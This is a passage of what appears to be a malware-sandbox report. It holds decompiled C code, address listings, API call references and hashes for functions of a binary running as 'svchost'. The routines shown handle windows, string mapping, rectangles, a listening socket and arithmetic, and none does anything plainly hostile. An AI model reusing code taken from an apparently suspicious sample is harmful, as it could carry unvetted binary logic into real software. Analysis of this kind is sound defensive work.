							__eflags = _t183 - 1;
							if(_t183 != 1) {
								goto L28;
							}
							_t184 = E00487648(_t292);
							__eflags = _t184 - 1;
							if(_t184 != 1) {
								goto L28;
							}
							_t208 =  *(_t207 + 0x14);
							__eflags = _t208 & 0x00018000;
							if((_t208 & 0x00018000) != 0) {
								goto L28;
							}
							__eflags =  *(_t299 + 0x14) & 0x00000004;
							if(( *(_t299 + 0x14) & 0x00000004) == 0) {
								goto L28;
							}
							__eflags =  *(_t299 + 0xb0);
							if( *(_t299 + 0xb0) == 0) {
								L21:
								_t186 =  *(_t299 + 0xb4);
								__eflags = _t186;
								if(__eflags == 0) {
									L23:
									_t187 = E0041D5E0( *((intOrPtr*)(_t299 + 0x10)) + 0x14, __eflags, _t297);
									_t68 =  *_t187 + 4; // 0x4
									_t277 = _t187 + _t68;
									_t209 =  *(E0040C020( *_t187, _t277) + _t277 + 8);
									_t190 =  *(_t299 + 0x44) >> 2;
									_t299 = _t299 + 4;
									_t191 = _t190 - 1;
									__eflags = _t191;
									if(_t191 < 0) {
										L27:
										_t192 = _t191 + 1;
										__eflags = _t191 + 1;
										E0040BC60(_t299 + 0x50, _t192 * 4, _t299 + 0x14, 4);
										 *(_t299 + 0x20) = _t292;
										E0040BC60(_t299 + 0x64, _t192 * 4, _t299 + 0x14, 4);
										 *(_t299 + 0x20) = _t209;
										E0040BC60(_t299 + 0x3c, _t192 * 4, _t299 + 0x14, 4);
										goto L28;
									}
									_t251 =  *(_t299 + 0x38) + _t191 * 4;
									while(1) {
										__eflags =  *_t251 - _t209;
										if( *_t251 <= _t209) {
											goto L27;
										}
										_t191 = _t191 - 1;
										_t251 = _t251 - 4;
										__eflags = _t191;
										if(_t191 >= 0) {
											continue;
										}
										goto L27;
									}
									goto L27;
								}
								__eflags = IsChild(_t186,  *(_t292 + 0x1c));
								if(__eflags == 0) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t208 & 0x00000004;
							if((_t208 & 0x00000004) == 0) {
								goto L28;
							}
							_t198 = GetParent( *(_t292 + 0x1c));
							__eflags = _t198 -  *((intOrPtr*)(_t299 + 0x28));
							if(_t198 !=  *((intOrPtr*)(_t299 + 0x28))) {
								goto L28;
							}
							goto L21;
						} else {
							_t286 = _t286 - 1;
							 *(_t299 + 0x18) = _t286;
						}
						L29:
					} while (_t286 > 0);
					_t295 =  *(_t299 + 0x24);
					goto L31;
				}
			}
















































    0x0041d090
    0x0041d092
    0x0041d097
    0x0041d09d
    0x0041d09e
    0x0041d0a5
    0x0041d0ae
    0x0041d0b5
    0x0041d0b9
    0x0041d0bd
    0x0041d588
    0x0041d592
    0x0041d59f
    0x0041d59f
    0x0041d0c8
    0x0041d0ce
    0x0041d0d0
    0x00000000
    0x00000000
    0x0041d0f4
    0x0041d0fb
    0x00000000
    0x00000000
    0x0041d108
    0x0041d10d
    0x0041d112
    0x0041d116
    0x00000000
    0x00000000
    0x0041d125
    0x0041d135
    0x0041d13a
    0x0041d13e
    0x00000000
    0x00000000
    0x0041d151
    0x0041d153
    0x0041d155
    0x0041d159
    0x0041d167
    0x0041d16a
    0x0041d16e
    0x0041d179
    0x0041d186
    0x0041d189
    0x0041d190
    0x0041d190
    0x0041d195
    0x0041d19e
    0x0041d1a1
    0x0041d17b
    0x0041d17b
    0x0041d17b
    0x0041d1a9
    0x0041d1b3
    0x0041d1bb
    0x0041d1c2
    0x0041d1c7
    0x0041d1cf
    0x0041d1d7
    0x0041d1dc
    0x0041d1e4
    0x0041d1ef
    0x0041d1f2
    0x0041d1f6
    0x0041d3bf
    0x0041d3bf
    0x0041d3c5
    0x0041d3ca
    0x0041d540
    0x0041d549
    0x0041d551
    0x0041d555
    0x0041d55e
    0x0041d566
    0x0041d56a
    0x0041d573
    0x0041d57e
    0x0041d582
    0x00000000
    0x0041d587
    0x0041d3d3
    0x0041d43f
    0x0041d444
    0x0041d44c
    0x0041d44e
    0x0041d451
    0x0041d454
    0x0041d46c
    0x0041d46c
    0x0041d474
    0x0041d484
    0x0041d484
    0x0041d485
    0x0041d48a
    0x0041d48a
    0x0041d48d
    0x00000000
    0x00000000
    0x0041d493
    0x0041d49e
    0x0041d4a1
    0x0041d4a4
    0x0041d4a6
    0x0041d4ac
    0x0041d4b4
    0x0041d4c2
    0x0041d4d4
    0x0041d4f8
    0x0041d4fc
    0x0041d509
    0x0041d50d
    0x0041d514
    0x0041d51b
    0x0041d522
    0x0041d529
    0x0041d529
    0x0041d52f
    0x0041d535
    0x0041d537
    0x0041d53b
    0x0041d53b
    0x0041d537
    0x00000000
    0x0041d4a6
    0x0041d487
    0x0041d487
    0x00000000
    0x0041d487
    0x0041d476
    0x0041d479
    0x00000000
    0x00000000
    0x0041d47b
    0x0041d47c
    0x0041d47e
    0x00000000
    0x00000000
    0x0041d480
    0x00000000
    0x0041d480
    0x0041d45e
    0x0041d460
    0x0041d463
    0x0041d466
    0x0041d5a2
    0x0041d5aa
    0x00000000
    0x00000000
    0x0041d5b0
    0x00000000
    0x0041d5b0
    0x00000000
    0x0041d466
    0x0041d3e6
    0x0041d3e8
    0x0041d3ec
    0x0041d413
    0x0041d416
    0x0041d418
    0x00000000
    0x00000000
    0x0041d41e
    0x0041d421
    0x0041d427
    0x0041d429
    0x00000000
    0x00000000
    0x0041d42b
    0x0041d42c
    0x0041d42f
    0x0041d431
    0x00000000
    0x00000000
    0x00000000
    0x0041d433
    0x00000000
    0x0041d421
    0x0041d3ee
    0x0041d3f2
    0x00000000
    0x00000000
    0x0041d3f8
    0x0041d406
    0x0041d407
    0x0041d40c
    0x00000000
    0x00000000
    0x00000000
    0x0041d40e
    0x00000000
    0x0041d1fc
    0x0041d1fc
    0x0041d203
    0x0041d20b
    0x0041d212
    0x0041d21d
    0x0041d234
    0x0041d239
    0x0041d239
    0x0041d23c
    0x0041d244
    0x0041d259
    0x0041d25b
    0x0041d262
    0x0041d262
    0x0041d267
    0x0041d270
    0x0041d273
    0x0041d275
    0x0041d279
    0x0041d3a4
    0x0041d3a8
    0x0041d3ac
    0x0041d3ac
    0x0041d3ad
    0x0041d3b1
    0x00000000
    0x0041d3b1
    0x0041d27f
    0x0041d281
    0x00000000
    0x00000000
    0x0041d28b
    0x0041d291
    0x0041d293
    0x00000000
    0x00000000
    0x0041d29d
    0x0041d2a3
    0x0041d2a6
    0x00000000
    0x00000000
    0x0041d2ae
    0x0041d2b3
    0x0041d2b6
    0x00000000
    0x00000000
    0x0041d2bc
    0x0041d2bf
    0x0041d2c5
    0x00000000
    0x00000000
    0x0041d2cb
    0x0041d2d0
    0x00000000
    0x00000000
    0x0041d2dd
    0x0041d2df
    0x0041d2fe
    0x0041d2fe
    0x0041d305
    0x0041d307
    0x0041d31c
    0x0041d324
    0x0041d32b
    0x0041d32b
    0x0041d335
    0x0041d33d
    0x0041d340
    0x0041d343
    0x0041d343
    0x0041d344
    0x0041d359
    0x0041d35d
    0x0041d35d
    0x0041d375
    0x0041d386
    0x0041d38a
    0x0041d39b
    0x0041d39f
    0x00000000
    0x0041d39f
    0x0041d34a
    0x0041d34d
    0x0041d34d
    0x0041d34f
    0x00000000
    0x00000000
    0x0041d351
    0x0041d352
    0x0041d355
    0x0041d357
    0x00000000
    0x00000000
    0x00000000
    0x0041d357
    0x00000000
    0x0041d34d
    0x0041d314
    0x0041d316
    0x00000000
    0x00000000
    0x00000000
    0x0041d316
    0x0041d2e1
    0x0041d2e4
    0x00000000
    0x00000000
    0x0041d2ee
    0x0041d2f4
    0x0041d2f8
    0x00000000
    0x00000000
    0x00000000
    0x0041d21f
    0x0041d21f
    0x0041d220
    0x0041d220
    0x0041d3b3
    0x0041d3b3
    0x0041d3bb
    0x00000000
    0x0041d3bb

    APIs
    • IsChild.USER32(?,?), ref: 0041D0C8
    • GetParent.USER32(?), ref: 0041D159
    • IsWindow.USER32(?), ref: 0041D28B
    • IsWindowVisible.USER32(?), ref: 0041D29D
      • Part of subcall function 00487648: IsWindowEnabled.USER32(?), ref: 00487652
    • GetParent.USER32(?), ref: 0041D2EE
    • IsChild.USER32(?,?), ref: 0041D30E
    • GetParent.USER32(?), ref: 0041D4B7
    • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0041D4D4
    • IsWindow.USER32(?), ref: 0041D52F
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ParentWindow$Child$EnabledMessageSendVisible
    • String ID:
    • API String ID: 2452671399-0
    • Opcode ID: a7452f2960d92d3a684d1068efa9b1c43d4c814e172b0bba0d04e3b2fde3cf21
    • Instruction ID: a5f20b7b88db69fc4b61bd10d8e82ff90ca639ca5de141c38bc98b161a3904f0
    • Opcode Fuzzy Hash: a7452f2960d92d3a684d1068efa9b1c43d4c814e172b0bba0d04e3b2fde3cf21
    • Instruction Fuzzy Hash: 64E1B3B1A043519FC720DF55C881BAFB7A5BF84704F040A2EF99597381DB78E885CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004783D4 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
    Download Yara Rule
    C-Code - Quality: 61%
    			E004783D4(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x49de30);
				_push(E00472CF4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4e19a8; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E004785F8(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4e19a8; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x4e19e4; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00471390(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00471390(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x49de2c, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x49de28, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4e19a8 = 2;
							goto L5;
						}
					} else {
						 *0x4e19a8 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























    0x004783d7
    0x004783d9
    0x004783de
    0x004783e9
    0x004783ea
    0x004783f1
    0x004783f7
    0x004783fc
    0x00478402
    0x0047844a
    0x0047844d
    0x00478455
    0x0047845b
    0x0047845c
    0x0047845c
    0x0047845f
    0x00478467
    0x00478489
    0x00000000
    0x0047848f
    0x00478492
    0x00478494
    0x00478499
    0x00478499
    0x004784a9
    0x004784b9
    0x004784bb
    0x004784c0
    0x00000000
    0x004784c6
    0x004784c6
    0x004784d1
    0x004784d6
    0x004784db
    0x004784de
    0x004784fa
    0x00000000
    0x00478515
    0x00478527
    0x00478529
    0x0047852e
    0x00000000
    0x00478530
    0x00478534
    0x00478576
    0x00478585
    0x0047858a
    0x0047858d
    0x0047858f
    0x00478592
    0x004785ac
    0x00000000
    0x004785c6
    0x004785c9
    0x004785ca
    0x004785cb
    0x004785d1
    0x004785d4
    0x004785cd
    0x004785cd
    0x004785ce
    0x004785ce
    0x004785e7
    0x004785eb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004785eb
    0x00478536
    0x00478539
    0x004785f1
    0x004785f1
    0x00000000
    0x00000000
    0x00000000
    0x00478539
    0x00478534
    0x0047852e
    0x004784fa
    0x004784c0
    0x00478469
    0x0047847b
    0x0047847b
    0x00478404
    0x00478404
    0x00478405
    0x00478408
    0x0047841e
    0x0047843a
    0x00478562
    0x00478562
    0x00478440
    0x00478440
    0x00000000
    0x00478440
    0x00478420
    0x00478420
    0x00000000
    0x00478420
    0x0047841e
    0x0047856a
    0x00478575

    APIs
    • LCMapStringW.KERNEL32(00000000,00000100,0049DE2C,00000001,00000000,00000000,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 00478416
    • LCMapStringA.KERNEL32(00000000,00000100,0049DE28,00000001,00000000,00000000), ref: 00478432
    • LCMapStringA.KERNEL32(004B880C,?,?,004E19C0,?,0047A878,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047847B
    • MultiByteToWideChar.KERNEL32(004B880C,00000002,?,004E19C0,00000000,00000000,00000100,00000001,004B880C,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 004784B3
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0047850B
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00478521
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00478554
    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 004785BC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: String$ByteCharMultiWide
    • String ID:
    • API String ID: 352835431-0
    • Opcode ID: df99220bf960930da31773b473e11d6c888c3e3c28566c72a8f847666ac17f06
    • Instruction ID: 993c88f653a3086166170ba2461b57764858c485ea7f4dcec785530c0086eac6
    • Opcode Fuzzy Hash: df99220bf960930da31773b473e11d6c888c3e3c28566c72a8f847666ac17f06
    • Instruction Fuzzy Hash: 05517C71940209BFCF228F54CC49AEF7FB8FB48B50F10812AF919A5260D7798D50DB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00420D70 Relevance: 13.6, APIs: 9, Instructions: 118COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00420D70(void* __ebx, void* __ecx, void* __edi, void* __ebp, struct tagPOINT _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v32;
				char _v36;
				intOrPtr _v40;
				long* _t42;
				intOrPtr _t55;
				intOrPtr _t56;
				long _t57;
				void* _t71;
				long _t72;
				long _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				long _t98;
				void* _t104;

				_t104 = __ecx;
				if(E00484C84(__ebp, GetCapture()) == _t104) {
					_t42 = _t104 + 0x48;
					_v32.left =  *_t42;
					_v32.top = _t42[1];
					_v32.right.left = _t42[2];
					_v32.bottom = _t42[3];
					ClientToScreen( *(_t104 + 0x1c),  &_a8);
					OffsetRect( &_v32,  ~( *((intOrPtr*)(_t104 + 0x40)) - _a8.x),  ~( *((intOrPtr*)(_t104 + 0x44)) - _a12));
					_t71 = E00484C84(__ebp, GetParent( *(_t104 + 0x1c)));
					E00489A84(_t71,  &_v36);
					GetClientRect( *(_t71 + 0x1c),  &(_v32.right));
					_t55 = _v40;
					_t86 = _v32.right.left;
					if(_t55 > _t86) {
						OffsetRect( &_v32,  ~(_t55 - _t86), 0);
					}
					_t72 = _v32.right.left;
					_t56 = _v8;
					if(_t72 < _t56) {
						OffsetRect( &_v32, _t56 - _t72, 0);
						_t72 = _v32.right.left;
					}
					_t57 = _v32.top;
					_t87 = _v12;
					if(_t57 > _t87) {
						OffsetRect( &_v32, 0,  ~(_t57 - _t87));
						_t57 = _v32.top;
						_t72 = _v32.right.left;
					}
					_t98 = _v32.bottom;
					_t88 = _v4;
					if(_t98 < _t88) {
						OffsetRect( &_v32, 0, _t88 - _t98);
						_t98 = _v32.bottom;
						_t57 = _v32.top;
						_t72 = _v32.right.left;
					}
					E00487591(_t104, _v32.left, _t57, _t72 - _v32.left, _t98 - _t57, 1);
				}
				return E00484BEB(_t104);
			}




















    0x00420d74
    0x00420d84
    0x00420d8a
    0x00420d91
    0x00420d98
    0x00420d9f
    0x00420daf
    0x00420db3
    0x00420ddc
    0x00420df2
    0x00420df7
    0x00420e05
    0x00420e0b
    0x00420e0f
    0x00420e15
    0x00420e23
    0x00420e23
    0x00420e25
    0x00420e29
    0x00420e2f
    0x00420e3b
    0x00420e3d
    0x00420e3d
    0x00420e41
    0x00420e45
    0x00420e4b
    0x00420e59
    0x00420e5b
    0x00420e5f
    0x00420e5f
    0x00420e63
    0x00420e67
    0x00420e6d
    0x00420e79
    0x00420e7b
    0x00420e7f
    0x00420e83
    0x00420e83
    0x00420e97
    0x00420e9d
    0x00420ea9

    APIs
    • GetCapture.USER32 ref: 00420D76
    • ClientToScreen.USER32(?,?), ref: 00420DB3
    • OffsetRect.USER32(?,?,?), ref: 00420DDC
    • GetParent.USER32(?), ref: 00420DE2
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000000), ref: 00489A98
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000008), ref: 00489AA1
    • GetClientRect.USER32(?,?), ref: 00420E05
    • OffsetRect.USER32(?,?,00000000), ref: 00420E23
    • OffsetRect.USER32(?,?,00000000), ref: 00420E3B
    • OffsetRect.USER32(?,00000000,?), ref: 00420E59
    • OffsetRect.USER32(?,00000000,?), ref: 00420E79
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$Client$Screen$CaptureParent
    • String ID:
    • API String ID: 838496554-0
    • Opcode ID: 48399e4f87c817582e6bd1e60a19b8e7c4b02e2f55068c033bf12efc016ad131
    • Instruction ID: 4357843f5900e8c3a63e9972a339a2bd7c56ee0ee9cef407ef4be6d8701846f7
    • Opcode Fuzzy Hash: 48399e4f87c817582e6bd1e60a19b8e7c4b02e2f55068c033bf12efc016ad131
    • Instruction Fuzzy Hash: 2E41F675208302AFD708DF68D984D6BB7E9ABD8704F008D1EF586C3351DA74ED488B66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0042A1D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93networkCOMMON
    Download Yara Rule
    C-Code - Quality: 20%
    			E0042A1D0(intOrPtr* __ecx, intOrPtr _a4) {
				char _v540;
				char _v548;
				void _v580;
				char _v600;
				intOrPtr _v612;
				char _v624;
				char _v628;
				intOrPtr _v632;
				signed int _v642;
				void* __esi;
				void* _t43;
				void* _t63;
				intOrPtr* _t64;

				_t64 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x40)) != 0xffffffff) {
					memset( &_v580, 0, 0x14 << 2);
					_v600 = 0x50;
					_t63 =  *0x4926ac(_a4,  &_v580,  &_v600);
					if(_t63 != 0xffffffff) {
						_push(0x21);
						_push(0x8078);
						_push( *((intOrPtr*)(_t64 + 0x1c)));
						_push(_t63);
						_v612 = 0x10;
						if( *0x4926b0() == 0xffffffff) {
							L8:
							E00429F80(_t64, _t63);
							return 0;
						} else {
							_push( &_v628);
							_push( &_v624);
							_push(_t63);
							if( *0x4926a8() == 0xffffffff) {
								goto L8;
							} else {
								_t43 =  *0x4926c0(_v632);
								if(_t43 == 0) {
									goto L8;
								} else {
									E0040B860(_t64 + 0x48, _t64, _t63);
									wsprintfA( &_v548, "%s:%d");
									E00482580(_t64 + 0x5c,  *((intOrPtr*)(_t64 + 0x64)),  &_v540);
									 *((intOrPtr*)( *_t64 + 0xc4))( &_v548, _t43, _v642 & 0x0000ffff);
									return 0;
								}
							}
						}
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}
















    0x0042a1d7
    0x0042a1de
    0x0042a1ff
    0x0042a20c
    0x0042a21a
    0x0042a21f
    0x0042a232
    0x0042a234
    0x0042a239
    0x0042a23a
    0x0042a23b
    0x0042a24c
    0x0042a2cb
    0x0042a2ce
    0x0042a2de
    0x0042a24e
    0x0042a256
    0x0042a257
    0x0042a258
    0x0042a262
    0x00000000
    0x0042a264
    0x0042a26f
    0x0042a273
    0x00000000
    0x0042a275
    0x0042a279
    0x0042a294
    0x0042a2a9
    0x0042a2b7
    0x0042a2c8
    0x0042a2c8
    0x0042a273
    0x0042a262
    0x0042a222
    0x0042a22b
    0x0042a22b
    0x0042a1e1
    0x0042a1ea
    0x0042a1ea

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: accept
    • String ID: %s:%d$P
    • API String ID: 3005279540-612342447
    • Opcode ID: 16c94a39f4dc8cb8a9edbd8b46e5db72f03e7e85788da1e3e05598827bfb86fa
    • Instruction ID: 809c778831b6bc2ffd921b9bfe6175c6ff4d505ed4de893e689482a9c52e3608
    • Opcode Fuzzy Hash: 16c94a39f4dc8cb8a9edbd8b46e5db72f03e7e85788da1e3e05598827bfb86fa
    • Instruction Fuzzy Hash: B4317531204601AFD314EB28EC989BB73E8FFD4325F404B2EF591922D0EBB599198B65
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00462670 Relevance: 12.3, APIs: 8, Instructions: 306COMMON
    Download Yara Rule
    C-Code - Quality: 70%
    			E00462670(signed long long __fp0, char _a4, intOrPtr _a8, short* _a12, char* _a16, intOrPtr _a20) {
				char _v248;
				char _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed long long _v288;
				void* _v292;
				intOrPtr* _t165;
				void* _t197;
				signed int _t203;
				void* _t205;
				signed int* _t207;
				short* _t210;
				signed int _t218;
				char* _t224;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				char* _t241;
				signed long long _t247;
				signed int _t253;
				signed int _t264;
				intOrPtr _t273;
				signed int _t274;
				signed long long _t289;
				signed int _t292;
				intOrPtr _t302;
				intOrPtr _t318;
				signed long long _t336;
				intOrPtr _t342;

				_t247 = __fp0;
				_t210 = _a12;
				_t207 =  *(_a8 + 0x50);
				_t205 =  *((intOrPtr*)(_a4 + 0x140)) + 0x80;
				_t165 =  &_v256;
				_v272 = 8;
				do {
					_t225 =  *((intOrPtr*)(_t210 + 0x70));
					_t218 =  *((intOrPtr*)(_t210 + 0x60));
					if(( *(_t210 + 0x10) |  *(_t210 + 0x20) |  *(_t210 + 0x30) |  *(_t210 + 0x40) |  *(_t210 + 0x50) | _t218 | _t225) != 0) {
						_v292 =  *_t210;
						asm("fild dword [esp+0x10]");
						_v292 =  *(_t210 + 0x20);
						asm("fild dword [esp+0x10]");
						asm("fmulp st1, st0");
						_v292 =  *(_t210 + 0x40);
						_v268 = _t207[0x10];
						asm("fild dword [esp+0x10]");
						_v292 = _t218;
						asm("fmulp st1, st0");
						asm("fild dword [esp+0x10]");
						asm("fmulp st1, st0");
						_v276 = _t207[0x30];
						_v292 =  *(_t210 + 0x10);
						_t253 = st0 + st2;
						_v284 = _t253;
						asm("fxch st0, st1");
						asm("fxch st0, st1");
						st0 = _t253 - st1;
						_v288 = (_v268 - _v276) *  *0x49a7c0 - st1;
						_v260 = st0 + _v284;
